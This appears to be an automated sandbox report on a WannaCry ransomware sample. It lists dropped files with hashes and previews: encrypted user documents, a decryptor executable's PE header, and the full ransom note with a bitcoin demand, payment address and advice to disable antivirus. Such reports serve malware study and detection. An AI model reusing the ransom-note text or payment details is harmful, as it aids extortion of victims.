                                SHA1:EBBCE5E8A38395A0E59B25AC39424CA806840B46
                                SHA-256:D20BE0D292531E803C2C082DEBE1D4C1529DEAD64EA6E97CE0271E6573A015DC
                                SHA-512:F7107ADCC6A5F15FD5DC060A3DEC4B0C433867865DD6458B6E99E6DCA86E5F96E4C9B85D2A92ACB93BD5346A3736A7F22AF445BD1EC117BB131E2E1C6381203B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Y4EA...J!..s..*_...'I'FK.,....y...}e../...@...i.8d.z..|.$.?.O.............M...~....LT.z..a..3$D..:....%n..8....y...X..{A8...?.G...Y.zU.}e..*...D....1.+..&...x......................_.>..Y.v1.aeeU......V..F(.?.]..~........gw_.....<&"...1>.................:y3!...[3.:.z......55..`..?.......Yq..C.$..*.....2........:..5....r.I[.a}....&*...P.].!......,..J...u+p...rJ....&..y..d...Fl..G%..A..]..#...G..0t..b...8.P...0....~_%.t65......6~LL;/...M....>..lo.<3."$........n....._Wi.B.E.k.. .n.....]....}.+.D...A.....}._.=..!....K.._$.O.D..Z@.Uq......PI..c.~.q..3...Z...{93..........e....Hx....i.8....^.G\...Z..F...v.(.....5....+B.b...i^.+.h...F......H.BA...u.Z.%...u.Z.....D..U{.,.Q.....t.'V..5..64..PV.2J*....../.m.w1cg;....cT.FR.po..=.........O..n=.p.*.\.+J.>...]e.....#Z4w&f.n}[.hnS.F.y8...."..S.J]...&/$wP..C+&....uK.E.!X...R..%u.r~...&%q[...a...8.l..........G2#.....]..y...r#...H.^GhY.3.*.....S..z.....lI......BB....3\..:fc...Z..-q.0

                                C:\Users\user\Documents\ZGGKNSUKOP.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832345468265153
                                Encrypted:false
                                SSDEEP:24:bkM6+2667wlhj7kpB+KBL+IOayqtSMsSj9VsTxN6zm7c2F2VXiiAyyj9Q63s7Vj6:bkz667uj7E+UtShS5AxszGjMOyYIVCb
                                MD5:E8752016336FA3CDD3A76B780320A97D
                                SHA1:EBBCE5E8A38395A0E59B25AC39424CA806840B46
                                SHA-256:D20BE0D292531E803C2C082DEBE1D4C1529DEAD64EA6E97CE0271E6573A015DC
                                SHA-512:F7107ADCC6A5F15FD5DC060A3DEC4B0C433867865DD6458B6E99E6DCA86E5F96E4C9B85D2A92ACB93BD5346A3736A7F22AF445BD1EC117BB131E2E1C6381203B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Y4EA...J!..s..*_...'I'FK.,....y...}e../...@...i.8d.z..|.$.?.O.............M...~....LT.z..a..3$D..:....%n..8....y...X..{A8...?.G...Y.zU.}e..*...D....1.+..&...x......................_.>..Y.v1.aeeU......V..F(.?.]..~........gw_.....<&"...1>.................:y3!...[3.:.z......55..`..?.......Yq..C.$..*.....2........:..5....r.I[.a}....&*...P.].!......,..J...u+p...rJ....&..y..d...Fl..G%..A..]..#...G..0t..b...8.P...0....~_%.t65......6~LL;/...M....>..lo.<3."$........n....._Wi.B.E.k.. .n.....]....}.+.D...A.....}._.=..!....K.._$.O.D..Z@.Uq......PI..c.~.q..3...Z...{93..........e....Hx....i.8....^.G\...Z..F...v.(.....5....+B.b...i^.+.h...F......H.BA...u.Z.%...u.Z.....D..U{.,.Q.....t.'V..5..64..PV.2J*....../.m.w1cg;....cT.FR.po..=.........O..n=.p.*.\.+J.>...]e.....#Z4w&f.n}[.hnS.F.y8...."..S.J]...&/$wP..C+&....uK.E.!X...R..%u.r~...&%q[...a...8.l..........G2#.....]..y...r#...H.^GhY.3.*.....S..z.....lI......BB....3\..:fc...Z..-q.0

                                C:\Users\user\Downloads\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Downloads\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Downloads\BJZFPPWAPT.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832522092590801
                                Encrypted:false
                                SSDEEP:24:bkObMJ46FJiM0qR2BIklBTYJid9cpOiv6Y+hvY+IM2uv+osQlyN0q:bkl46FJiMJgWklBQiDcpYYyvY+AGvrUN
                                MD5:B8F6B29F78898399B73C248FCFE9E078
                                SHA1:C278B26CE2DAB6431750D2E4E479B2596D277A0F
                                SHA-256:098585C264F1EEEB90092D3F2F939378837DC80435E318B09EA86FF24B4250E5
                                SHA-512:BF1807AC66D2168EAFB92E418AEBB0A9F9C794AF5F7C49FD87AC04C4CAABE3E470D5AE232D40388527EBE2BA80D5780260D0A0CA274921507D3D482F7FE62DE4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....v..V...Y.)?..d..]s.......x2.A..%'.b .D...lb....(.e...>3.^.ZB..}.l.....r.....ge.(..X....51...=t./.t.'.C:+q....?a$.g.......k>..[Vo....]...D.Q.aJ8.K...{:o..:.0...5..o.xW...{u....<O......;.4.......B.....l.|t.....>".......2}.....U.'F..Zk....u.u.a^=.................jjh.6...........=.%.3...B.gB.'......si...yX.{....m%...K...R...-.9..2.b"...lmW.&......Z?*q......(\....e.....}.N.\.:.H.|.0.T..G..m...J..,vq...{(|.x....xv....a....k......O...UR9.vC......0.S.G......=...R+e...T.t..M....)kFW........]#..................O,.L.n..^0]'......h...`U.Y.j5.;..t1g@X.1`..i..d..o`..l..U.W.?!..S..$h.. .2;.M!Q.I.(.$G.+....u..#.6.....hq..<.!..H@S.j........_...g.x..8MGM....X...e'..........T..."..)G_t(S.E].&U).V.Bu<...o.kI. T...Xe.s.V.5'/.H...IQL..}R1...eM[\....X:....?B.<)1..KWn.F.~p.in....En.i}.(...@'....-.....L........x.... B...).4..7......T...}.."._.9..M.=.#.D..9.Z.%.... ..Y...\G./.p.)M...@.=..aH.....i...+C%A..i.j.i"....|..t_.......v.y.}F%...f...0......U.

                                C:\Users\user\Downloads\BJZFPPWAPT.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8505685355613
                                Encrypted:false
                                SSDEEP:24:bk/xlR+gOH/vnTIn1tH4fv6m0kPwx3JqyKAVXwkmeSILX:bk/RkfG1tHeoJq6Hme3
                                MD5:1E5C277D620571C2E899B291161AF83A
                                SHA1:0A25848000F6BC17AFD724107DC08E968DB0C35F
                                SHA-256:F0D3CC05FCB513C107DA7F23C3E41B37766945EFB6F6EA244A6E651D6C989EF5
                                SHA-512:60987DF412BEB71756B9A43C2A54AC15C62804191F84B2CA43FF0315D6CB50DF6FCBDEBE6DA78024B6D33FCA02AB70DAC71343C8B467DF4FCBE0DFAE411FD58F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....a..T9.<.^..Aa.kG+._,......rl.6~.k...{...Ry...vkE.GM.E..s\.....Y....t.dZ.......q.Rt:...Y5h.^.tc.k...`.Ob.3...d..6io..xU._.`cS.E..........f.p....I.(......`.V..{.wt.:.t...?,../..n..(\dA ......d..0F]$...Vt....].S.(4.z.......2a.....".O0.Hm.................:P.X.i8.. T..T.7uJ...t...`.Mu7.d{Q..u.;..u...........y.Y.....V.f..[..L@..6..q.7...|.............K.`R.F.d{R.[....A...~.....o!.*.$Y.....K.v....),).V....`.Q.k..L*.+.,0.+6q...,.$.r.,h.S%E....D..2#....c.~aD..z.%.F.Oi;...y.Os....`.["..^S.q....m...\.mh.mT..c....hZ...w..yT.q5w.YQY...aX1.x).T.B=..T<.....{.v...Ovy..E...P...a.@..*.Bun...8.......[.....8......u.1.. ..,y..........t..Q..i0......p.i............$...O....J\..*...B..'.E...=S.{...r......E.Mc[.......o...~...X.....%.I.{"...DR..5."......J.D>..F...,..".7...kj..zV.....,.D..$%G..@..T.0..o.g_..........:.y....tbM...9+u'....I..>...R..]...5...yp....l.....o.Y.9/.....j....j..0@S.\...{+... ....L*.d... .<H..H?.d...{...@.%.....

                                C:\Users\user\Downloads\BNAGMGSPLO.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814028573461258
                                Encrypted:false
                                SSDEEP:24:bkmY3RoUPTqMKQX+hPc6UownNv1754jF1wi2LrRGnkgKN+W4:bkmmRRrqMRXec6Av1mJOjR9nNW
                                MD5:FA3954774C3BED2B0C03FA7ED3B0D995
                                SHA1:F0EAC93DB39695ADC1B015B63798850034DFAE8E
                                SHA-256:AFA7AD6B2DAF8E270CEC41CCDFFF8DEE27F9DA0F4E92780DEB854712768542A1
                                SHA-512:1D84901E540121B3375A2D51F616819BA12E584A379288D62E203C57BE7AC4756E15F27956532605E97CF20CB1CBE525CF4803B7C4EF94EA76CBE4554F8A8222
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....k.@......Y6{.Q.s..5......."..,.I.1\._.&..?.w....$w..z4..F.M.Y.0.f.){..*M....~...x.L.....j.A.....%"&....#[...`.{.....nuz...l.G..Pp4..}.K7.[..k.J.|..K.X.Z.D~.U..^. 6.|?%.7o...E.h..V...paO.an...K..3>EK]m........(.J..........Kx.m.%..w9.t.3Ge../...M96."............;h.oS..U(.8............8...X..wQ.}N.B.:.....q9Q%.a.tg...W.....Rz...t.P...........i(@.z.Lj..B.Q>J...eg.......i......hf..O..m#..P.|.\..^.....)...x69..wY.L0:.d.c.|...."R...eC..Ci`....Z...Z...p.E...7}~..k....U_X....1..&.uC3~...r...x...G..2...R.._.y.._:...t...r...........T..Y....*.y#....L.Sx...}..XW.......t7..C.R..Oh`..2..8.... ... NJ..W....].l.V..A..}..r..Z..7.f._.jA.....Z.Y.eY.DO4.`XL...4b.02..u...m...>....#]..S.ze8......y.R,.......t.....W..7........Ag..B.q....,Ql.2..{WDE..9.7.......x.rz?...N1...A~.i........0....m...=-#^.....C<..y...B..S..L...2....j..1...u...c.....W..}u.....(.L6.+. ..........^1W.u2......\. ....A5>.....h..q|......GW[..S.1.q..../..f`A...*{....`5\.

                                C:\Users\user\Downloads\BNAGMGSPLO.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8433977714800385
                                Encrypted:false
                                SSDEEP:24:bkUZNLqZ12toDwSxwksoiUWxO5qD9J16s4qWOmJwmB5TVgPBzxra:bkUZgZ12tUDRFi15Lo95O+w65Z0Za
                                MD5:794F8BB42C90B566FA9CAE748E9893A7
                                SHA1:D9F03C214BB83DBB391F39E7EB1CE901AF9C2585
                                SHA-256:C66A0F5626178A25A8CD961B9F3BC9423638F815C6F6FD7AB9DAC10345B549B9
                                SHA-512:453A31C57C19079C6278C31763C91C64DE678B5041C9D32A48F44BBCD2D08E1A4EFB9FB743F468D4EA49350A7B90E2DF3103BC8E3003AD00617751FCB21FB332
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....M.PO.......^.\a.-...8}j.sJ...-$.x.*\..n...&..X.2.tR...U.J....1..`...<...$.X...~....M. .:.....^G<j....t.:.A.6e)....s...g..w....o...$.+..+'.....c8c.m.@.9...h.Q.U.Px|`1. .;.'........l.<..3n.2a...djq...l_.....j76..*..ZJ.:.=+..00 ..K.~G..A.......O.3.............'.N.N.Nz..x....../99.%!L.B.n.k.._....5.g...*./...p....f..V.e(... ..T/4..v%.]+....I.o..\.%.Z.B..3...d.L/.?_l3..r.}.1.'.w=<..t.)...k......z.kQ.T..."....5.D.4.7..Bb.U.3B..%.......Xa@V...c.1S...T...<|.Y..B......h.l`.. Z. P..9....v.E(.U...ZS..n.x.}}G..&..@..F......4$...yX.^.;)d..`..Tb.a.<.c...u.....O./..:\.#|.*lU_.W'.M..}5r...+.......Zr#p..=..3..?fp.I.'...ar......(...1.|z.$..M..?._........R....OTD...l.L..F.......$Y...e#;a...N..?..@Cw...z.....|..D...S.<...:........,.bQj`.....&'...f..yb...-...d.....9..7)w.e.8.C...(I1B.C/...<.bAp.|..).5|D.;....a../.0..O"h.Y.X.._c...z....h...$N.U.w.w..j.......:.0.p.K.Z.......Y.....F8;..gp~..7....5...)W.......Z.n3R4......O.M.[..yb...H.F.]X(*t

                                C:\Users\user\Downloads\DUUDTUBZFW.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854025596643254
                                Encrypted:false
                                SSDEEP:24:bk5ajgMtVW46ODeyyuHrpxP/RnQq0VB2Jx3f69bGw/SPNH1k0ME:bk5ulW4tRVx3RQ5kmvSPNLME
                                MD5:FF69DF1EAD582915A27B85F372AFAA6E
                                SHA1:A4E59376BA8EEF9AB6696F683E04AC6938F471DC
                                SHA-256:FB9978D78208C5F275829997CB027CECF7D2246C3C18AF5FF3FFAFC29DF34856
                                SHA-512:DC57CEAC7B06A8B883F655E8E3C16C936F184B4671F5CD3FA59AD8206A3C5C228CAD3EE020BA695A7A95160E27DBB2A624C6544667F7537C356F97FD3F13DF7C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....=..-^a^....dLT.e..U8D9_;y..[..A.Jz{.IC...X...u.YO..,..*KXv....yW.+.......qN..:A!..T....4....:E.n......B.TUx..D.sG|8.H.iH....w.cfR.]c..x.........g......b.:....\d..}.H]..".^......@..|.j*O8w.j.[...0.a..>.....b...... ....HE.@.}_....b..4..q.m.D..e.L7................N.8+...&...../Vm.^.-.3...!-R.l....Y..$)-....0u...W......A..I...........q.d)nrZ._.-{....L.k........X....jvX..v.....]\....J.f.^.. .A}...uO2...a"|...gn...D.>(...e..s...!.x.1..]....S.[.uk.........V.........+)'vd:...D..6=.4q....-.<.)]n&.@$.$.....O.'.6A&._u.gc.u. .".D..e"..+.S.....;.t.....$G....;.L.W.4..N..\...~\(..l>.a...0....;..Y...x..?..E..e....v....^4...g.f...(.[..N...w..+.$.7)..........@:....w....bb........Z]:...qW...X.9.{+r..;..s..~....Z...L2f..w..c?....KF..[i...Q.H.W.\._.o.../`.....5t.;...oO:.......-..v..<4.L....~%...).|..h~.;f.......g.q.{.#....r.EEIz..h'I.A..l&..4..K..L....*M....S.=18.b...X.a..!v......V..F.....;...3r~.G.%...g.JSuo;....q[DA.Z.{~.='..p.....$.{..d.

                                C:\Users\user\Downloads\EEGWXUHVUG.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8307922297876615
                                Encrypted:false
                                SSDEEP:24:bkCshLIvt+eIwfOb9qhz46lcmxxqzxbumO7WUZe3MAFyMBRREW1mDCBmeMOA+yTe:bkCnzbfBhzgCAxCkUIt3EWMC0eMcl
                                MD5:51945D90B02325120FBE1391081280D6
                                SHA1:24FAF4FE9B05E32D422C0055658C749EE53D5D84
                                SHA-256:07A7D3B178579AF322C4E52005479633912CFFFDA2B8E562CB2827EBE554A30A
                                SHA-512:4B0587976C065F9E99E135878799C698280ADE00B02B6CC3C571B99D255EBBB7941B62554988CC472AFA9351AD7BC3A7FB1BFC81782E091EB2F70122678F521A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....;...:b.`.r. Ja.f.:0.!....b..../.{`..."...1t/..}.6....y.`.C.9+.....d.+.1Mc...V....LC...B...6.p..%..Wx.Oj.,R1..Ht.y..,............z'^.{n.iLC..uX.?...F.f#M\m..70..L.^.|i.....6-.(.i.Z.8a.1.S<...]._Z.1T....p.-...f.:rs.R.h..]...*iWQI.-........"=..=fK.>Y............9........o.`.m.3$...=|.N...e."n..^X...mB....Q...)......./N*.,%.[.#.2C..W...h>.DB...*.W...../.R...%.`.8(H..O:.'#.-.....|..eu......W....M/g.. ...5.[4....bv...;....P..L...bE.w...S4`.-.=|.-.7k....jq.N3r.A...k..g./L.d......iY.......v/[.............6B.6.-..ER......*..Q.hm...Q=......<......ET.L./........^8s-....B...|..5.P..e...N.6w)Ps..........n.9Q{.._..-..C.AZ.i$A..'..w)%...}.+.4Wq.6.;..3c.o.........".1M.!.........i..x...\..~.SN.4o.H(.W.1..0".z._o.R^......e...K......8..........%.!g..{A{.mH.~5...K.8.....+...|[/.O.....~.mF"L....q1..c..{b{O.%.>...Up.n.9...Q.....>...o..4}F.6...l.zR=.hR.-.v..3.lfH.........4...P...d~g.aA....`P..D ..gs@.G~......].%.*.r..O_*^,..5..> +...K.,.A.7...6.u.S.8|.

                                C:\Users\user\Downloads\EEGWXUHVUG.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849610407296905
                                Encrypted:false
                                SSDEEP:24:bkLwiL/pEep6VotNcoR+kA9K02Q8DnOZtiAagOV8WcEy3JkAPQG7dwqVgl3:bkLT/ZpEotNcoAkdO46tiAO8gkJk+7dW
                                MD5:6B73524B59B45C1F19AD3421AC7221D4
                                SHA1:A0E76F6CC37A9C393E8889D9216C6B75B5DCE5CD
                                SHA-256:CB5A6950224D0EA4534DDE00C97F6E638B593FB29C535545667685F82E36F7D7
                                SHA-512:52C3B93AFB8D1C1CC3849C56DF7EC25C84BCF7E0E2AE94A4920D57B5350265ED36249C87F63027B09C39D9E7002837EE6E6EA1515B1A8FD9FB4861332823E38B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....t=..7{.u.....O..../..t....a..Oc.. ..)..*...=.=..).E!S..C...7.v7..(...6....>X.......=+#..^....F...<..u..b..).a.1O..M....>...pz...dF..zV...O......C&..:.2..e...6...`j.....J..s..s.k.jC.#.I.......+.,=..BVa....\.G..E9.z...N{HY..[.b.....E...xr.............rr../T.AZ..2.r.@].@E"&U\v.Q_a..C.!JO.X......H........C....e...p.{...s...8.6.".p.,.. R.x..l...<...rCpe...(E......7=..>..h.......PX_M...YS......|...'....y........q.9.M.1mT..aX.alT.]...w....%U..b.}...M..J.w.L..j...?....k.*_=..R...I...?.E..jdi.....|,.(..X..(Ee^9....?..P...wOqn...|.....X_*..~Uzcy..5T.s...?..[..j.....:.......X.._'.P+.}A.$.i.yo..,N.....?K.....mY.;H.5....=j.:'........N3......@H.y.E.4%C....$..^...j...x.2/&.hX..V!......5...6..r.q...o`...p.u..k]..=4...f$...._.P;P.. &..FQ..g1U_....Ba1....D3....._......Q.. ?.x4..3...'oL....j.Z..i.#d.z.....@..q\..`$..u..z.6......Ud..a.M......2.....cXJ.8I.A|..g.......-MJb.*wj06G.x.A..J........-..:..;....@*.@....[.f|......UY....u..2^]F.M..J.

                                C:\Users\user\Downloads\EEGWXUHVUG.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827183757966153
                                Encrypted:false
                                SSDEEP:24:bk9+Elro9Xq4i6luI4V4kOZfTsCErKcaoy/T6x/2t5fWgg8Kn:bk9+ME9LiRV2sCeKcS7aujWgg8i
                                MD5:EB46443E15D80AE116C4DFF6D6ABDFA2
                                SHA1:4BD3E8BFC9BA7FDE65AA6FDEC8D6458690DE928F
                                SHA-256:015BAF595D6A70164F487EC960938A58A061A981C7B06D2B0A0481E082CBD624
                                SHA-512:A6F5FE08B6056A43C9F1EF2C09B0043FB6EF4EE51FEF316604D5E49FFD59051F98FC40EF5360F845CC615BEB73B17D3E96B79735457157723D459981348F767A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Q...5i......WW...3....AI....UX{2f |...n0.............?!3S..w.U.3....]....>...4.a].. ...^..7....3..."..b....2...?.....>.....p.%..4...]c....6..:wRyq.ou.....<.....R.L..[.|..k.d..X.....I..X........m...&g..rY..hSn...oK.!2.....}..5mb+#s...................H.'o%h.f......+>..^.J...:Pw_Jy.WXY.s~-.$v.t.).U'..[..Cpg..h........s...o.e..u..+.:b.~......6V......}...e.6.X.+..e&..:D+....M.X"...4N..^#.....}.i.1nC.=.k)..|ST...!...a.ro..i..2y..{=.......5.[!.A.Q..Ac$p3n|=/`W.^...pv*.?.K$.7.c#v.....1.J..K..Y..y.f......o.f.2vC . VD..<rO.^.[.D.R.F/(K...l(.5'v.815..M...pVb.b..Z.#...%4.5.:b.XEJ..g...XW.k7^j..@SU.v..&v9=...c...k..Z.R.W.co...v.F.4.....%....Q.C.=........XP.%....pkC....k..L.)...3.}......R.my...#j..oJ..A[..........q.r.9_A....N..s.\.......pT.n..J.f..-.c...e.[....Ka.a.....X^..DN`....k"Y...P..a.="|.!.y.....3..*#-..HW Q~/.{....-*y.!.e..?B.}Ph....|.AU.wT..?.61a.u..g.cu..L....}.5K..K9..%....)..<p....-.....TT..r4..R...2s..Y....P..e.]4....=5@.p.

                                C:\Users\user\Downloads\EFOYFBOLXA.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838501770158683
                                Encrypted:false
                                SSDEEP:24:bkNPgtD9kvXTuyyCuGaAB2rJbrsjwQbXSTMHTIVOqMbPoEdm2UZjB6tGDAshA8sv:bk49kqiu9Y2rBszbCkuO3bg0Hn4DAsut
                                MD5:EE96D99B5C8B6CC9E9E92082328D3DDE
                                SHA1:D9628DB4809186FD3053E2F8D676E38744BEF45C
                                SHA-256:A577A75770B7DA5975A7417F34C8F5279A25EDAE6A9BD79CD4A029C2C28FEAE5
                                SHA-512:F7F2BB8F8D7B032AA6D32796476ADBFA746E889E195CE2971120F9CD5C248D3146231B336FD3F4DDD64FBA6C71D4323D8371ECEA694AC9641FF109D3BA055D84
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....P'K.C.)......4...Je.O.=.@.`{.,..Q.......'...(gd......R..D.`..n....$94.A.{.H.P..~M..X..]...{.vp...6VhP....`.p.Ou..1.G..(x..{.T.H..fB6=...Om....2...5.k4....y..1a+R....utK.E9E!../b.._.:....z .m|.6.L.jyg..P..nd......3J?.C..4f.=%~I.J~q.....w..A".............c..]b.D8.p..o{X,.....#(.....ziI..5Ek2...'.M.z#H..f..Om..(b....r..,`1z....)#.OX..].\Q...Y...FD.kx.?........:^...N..<..U....,I....x..l.1...n.>...s..O]L2.N.....8.t....y....S..v..H.....|^....:...{RA..aN^......V.c..-.9..i..Z..*;;.wu.l..f...[O...Y..#............hZ....N..-....0.4..ppZ...9....\.m.MrL91f$w..=.....5.'L.....t.h.....Ju;.d.xB.tz-..X.2....t.~...U..v'..? ..sQRz.....'B..< ..P...4%lj.....v......N.q.+[^.~..7...%;O.<?..jI.R..{......'...fm.F...r....O...E@..L8R../.......[.^.9.......t|..\.)....,.....n\Q..FV.........&..gk.k...^.0.x@g.$.q".XJ.....H.....=O..Md....S.....{.~..N..W.P...Y.7V`......W..f.8m......T.$.]FZ.".Q..0.......M..~G"...V.9.L...H@..a^.Z.tfp.|...m.-.;..Rru.p..w.P

                                C:\Users\user\Downloads\EFOYFBOLXA.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.829501966490435
                                Encrypted:false
                                SSDEEP:24:bk5Kwyp+nmMAL0msq8Gh969ZF3iK1gdJhg7RzG4FB69mYJdkbTKJzJbzgqs:bk59yp+mhGqr69p+Gz4f7GcZzgN
                                MD5:21258B25FE371FEEAE47C7914FA4413C
                                SHA1:B008F21F954775F6D5F16D6CDF4F16DD41443F67
                                SHA-256:EB52EDAB1D6DD6934B1047D806BAE4C971DAE6D70FDF5B99F163601E3998404F
                                SHA-512:71B7DE90DF176D2F47419DFB7A2C1BE2ABEA154EC81F58C9B4885621A50EF6380ABAF13EF77CAD64095E020690C07A3771F65CCFA44C2D077F0EC79407AA2728
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........{.*.6.....Pd......L)....4c...."5.`s...i}){{.7....8B.$....np..1+.......e.. #.q....U*....wn9.;..;....3{.....%.@...GJ..@xy...A.i...7a7..A....W,.#.B$O.Kr.....Y.pe.A.#.#.m...}h..DI...g]J..\.(...+.B..U.>.n...,. ".Y..x....B..;...G-.'.@I.I ................(~-.@j.@D..J..mM....s.....i...[.T...Y,.9....:.c....|.J..rR?....,....u.a>.. "..1..J.t.v..+..]...F...$..e.t...gK.J.2.4yv......".b....}Q.D.v..:`..o...^...l...).....@_Maa..WW.(.Y...x.>..R{.3.^.3}s..3\.~#L.I ..?o#........gT.}...u..e.K........A...l8..`0na..E..)o....../*[.....c7....l..........[..\.....#U.}.~Y...B....@.Vsf.l[a...1..I.@:Z........?Ls{.N&....D`J..............&.../......2.K.>.....w..._J..3.<.H%....[(r:Y.....Bv...)]...\W{q.....gV.^...j3....0....}Ue......$.....t...?\._..^.\{+..x............J(.lTk..`./G..Y.?.\.?....{G.a.7.....c....l..yW..A5......(Nj](p..']?/n.O^H]c....;x8....z...Q3lA..@..,~;V`xz......@ S.l.a...^.0M....le.l.2.+..U.D...#.........w.....0....9....$?..!Q.h[zj2

                                C:\Users\user\Downloads\EFOYFBOLXA.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.825624611685154
                                Encrypted:false
                                SSDEEP:24:bkP1j7EVne+yELihKKAjoc37CPo0MOeSwgpnHBMcz9CBOwz2izUW:bkP1j7UnnLinnYOeSNnH6wOLzUW
                                MD5:F04D85D7B05F7672198B088110326E83
                                SHA1:D2610A5EFB698C6ED09A667EDC0DFC143522FA53
                                SHA-256:6F7EC1BC4085BF7119EEE11EDDE548FA2657B161B18A5D15F2D7408EC5669A1F
                                SHA-512:41C617695F5D490E9406CEB1B14F4E5BAD53EC88CC958713ADF2EA995F12358F78013483850B8A2D5B67A511E15B76D876DAEBC8EFAC865C51405AA513B007CC
                                Malicious:false
                                Reputation:unknown
